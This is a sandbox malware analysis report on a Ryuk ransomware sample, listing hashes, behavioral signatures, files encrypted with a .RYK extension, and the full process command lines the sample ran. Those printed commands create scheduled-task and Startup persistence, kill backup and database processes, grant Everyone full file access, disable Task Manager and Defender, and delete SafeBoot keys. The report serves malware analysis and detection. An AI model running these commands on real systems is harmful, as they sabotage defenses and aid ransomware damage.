Malware Analysis Report

2024-08-06 09:28

Sample ID 230309-w52hxabc8y
Target Ryuk86.bin.exe
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
Tags ryuk discovery evasion ransomware
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

Threat Level: Known bad

The file Ryuk86.bin.exe was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Deletes shadow copies

Disables Task Manager via registry modification

Drops startup file

Modifies file permissions

Checks computer location settings

Enumerates connected drives

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Kills process with taskkill

Uses Volume Shadow Copy service COM API

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Opens file in notepad (likely ransom note)

Runs net.exe

Modifies registry class

Creates scheduled task(s)

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported 2023-03-09 18:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2023-03-09 18:31

Reported 2023-03-09 18:33

Platform win7-20230220-en

Max time kernel 47s

Max time network 34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"

Signatures

Ryuk

ransomware ryuk

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_COL.HXT.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR7B.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15018_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Earthy.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\JUNGLE.HTM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\bdcmetadataresource.xsd.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01139_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\MST.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00524_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107134.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21504_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0089992.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107516.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\THOCRAPI.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXEV.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ADVCMP.DIC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.JP.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.POC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01183_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00274_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLED.EXE.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0216858.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\messageboxalert.ico.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107526.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00320_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\QUAD\THMBNAIL.PNG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02369_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALNDR98.POC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00286_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.INF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A (64 identical entries; duplicates collapsed)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target (each entry was logged 4 times; duplicates collapsed)
PID 1348 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1468 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1348 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1348 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 472 wrote to memory of 1328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1348 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 268 wrote to memory of 524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1348 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 684 wrote to memory of 1320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1348 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 588 wrote to memory of 1240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1348 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 984 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe

"C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\SysWOW64\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

Network

N/A

Files

C:\ProgramData\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 d9876c40c0deeed3a19a371bdc127213
SHA1 86c2e629e33a29ef280896b6415186c119e211e3
SHA256 7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e
SHA512 00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 f3642fa051609bd3e193a24379b547ec
SHA1 920dca74fd4c08cc17cadf3d7a5169f201296075
SHA256 580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb
SHA512 24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

C:\ProgramData\hrmlog1

MD5 d9876c40c0deeed3a19a371bdc127213
SHA1 86c2e629e33a29ef280896b6415186c119e211e3
SHA256 7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e
SHA512 00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

C:\ProgramData\hrmlog1

MD5 d9876c40c0deeed3a19a371bdc127213
